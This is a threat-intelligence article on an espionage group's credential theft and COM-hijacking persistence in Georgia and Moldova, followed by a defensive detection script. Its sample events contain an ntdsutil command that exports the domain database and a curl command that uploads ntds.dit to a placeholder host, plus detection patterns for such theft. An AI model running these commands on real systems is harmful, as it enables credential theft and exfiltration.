
New APT group ‘Curly COMrades’ targeting Georgia and Moldova

A previously undocumented threat actor, dubbed Curly COMrades, has been observed targeting entities in Georgia and Moldova as part of a cyber espionage campaign aimed at establishing long-term access to target networks. The group has repeatedly attempted to extract the NTDS database from domain controllers, which serves as the primary repository for user password hashes and authentication data in a Windows network. It has also sought to dump LSASS memory from specific systems to recover active user credentials, potentially including plain-text passwords on machines where users were logged on. Bitdefender, a Romanian cybersecurity company, has tracked the activity since mid-2024; the campaign has focused on judicial and government bodies in Georgia and on an energy distribution company in Moldova. While the campaign has been monitored since mid-2024, analysis of the artifacts suggests that the activity began earlier, with the earliest confirmed use of the MucorAgent malware dating back to November 2023.

Curly COMrades are believed to operate with objectives aligned with Russia’s geopolitical strategy. The group derives its name from its heavy reliance on the curl utility for command-and-control (C2) and data transfer, alongside its hijacking of Component Object Model (COM) objects. The ultimate goal of these attacks is long-term access for reconnaissance and credential theft, allowing the operators to burrow deeper into networks, collect data using custom tools, and exfiltrate information to attacker-controlled infrastructure. Their operations exhibit a methodical approach, combining standard attack techniques with tailored implementations to blend into legitimate system activity. Notably, they utilise legitimate tools such as Resocks, SSH, and Stunnel to create multiple conduits into internal networks and to remotely execute commands using stolen credentials. Persistent access to infected endpoints is achieved through a bespoke backdoor called MucorAgent, which hijacks class identifiers (CLSIDs) to target the Native Image Generator (Ngen), a component of the .NET Framework; the hijack gives the backdoor persistence through a scheduled task that is disabled.
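The tradecraft described above (NTDS extraction, LSASS memory access, per-user CLSID hijacking, and curl-based data transfer) maps onto a small set of endpoint telemetry checks. The following detection sketch is an added example, not code from Bitdefender or from the report; it runs over constructed Sysmon-style records (the CLSID, SID, paths and hostnames are placeholders, not indicators from the campaign) and flags the events a defender would want surfaced.

```python
import re

# Constructed Sysmon-style records for the walk-through; these are not telemetry from the
# Bitdefender report. Event 1 = process creation, 13 = registry value set, 10 = process access.
SAMPLE_EVENTS = [
    {"id": 1, "CommandLine": r'ntdsutil.exe "ac i ntds" ifm "create full C:\Temp\ifm" q q'},
    {"id": 13, "TargetObject": r"HKU\S-1-5-21-11-22-33-1001\Software\Classes\CLSID"
                               r"\{PLACEHOLDER-CLSID}\InprocServer32\(Default)",
     "Details": r"C:\Users\alice\AppData\Local\Temp\loader.dll"},
    {"id": 10, "SourceImage": r"C:\Users\alice\Downloads\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"id": 1, "CommandLine": r"curl.exe -s -T C:\Temp\ifm\ntds.dit https://upload.example.invalid/"},
    {"id": 1, "CommandLine": r"curl.exe -sL https://example.com/ -o page.html"},  # benign download
    {"id": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},  # no VM_READ
]

# A per-user CLSID entry shadows the machine-wide HKLM one, so an InprocServer32 write under a
# user hive (HKU\<SID>\Software\Classes\CLSID) is the registry footprint of a COM hijack.
USER_CLSID_INPROC = re.compile(
    r"^HKU\\S-1-5-21-[\d-]+\\Software\\Classes\\CLSID\\\{[^}]+\}\\InprocServer32", re.I)
# ntdsutil's IFM export, or any direct reference to the NTDS database file.
NTDS_EXTRACT = re.compile(r"\bntdsutil\b.*\bifm\b|\bntds\.dit\b", re.I)
# curl invoked with one of its file-upload switches (-T/--upload-file, -d @file, --data-binary @file).
CURL_UPLOAD = re.compile(r"\bcurl(\.exe)?\b.*(\s-T\s|--upload-file|\s-d\s*@|--data-binary\s*@)", re.I)
LSASS_IMAGE = re.compile(r"\\lsass\.exe$", re.I)
PROCESS_VM_READ = 0x10  # the access right a memory dumper needs on lsass

def detect(events):
    """Return (rule, event_index) pairs for events matching the campaign's tradecraft."""
    hits = []
    for i, ev in enumerate(events):
        if ev["id"] == 13 and USER_CLSID_INPROC.search(ev.get("TargetObject", "")):
            hits.append(("user_hive_clsid_hijack", i))
        elif ev["id"] == 1:
            cmd = ev.get("CommandLine", "")
            if NTDS_EXTRACT.search(cmd):
                hits.append(("ntds_extraction", i))
            if CURL_UPLOAD.search(cmd):
                hits.append(("curl_data_upload", i))
        elif ev["id"] == 10 and LSASS_IMAGE.search(ev.get("TargetImage", "")):
            if int(ev.get("GrantedAccess", "0"), 16) & PROCESS_VM_READ:
                hits.append(("lsass_memory_access", i))
    return hits

if __name__ == "__main__":
    for rule, idx in detect(SAMPLE_EVENTS):
        print(f"{rule:<24} event #{idx}")
```

The curl upload of ntds.dit (event 3) trips two rules at once, which is the kind of correlation worth alerting on; the plain download and the system-process access to lsass are left alone.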
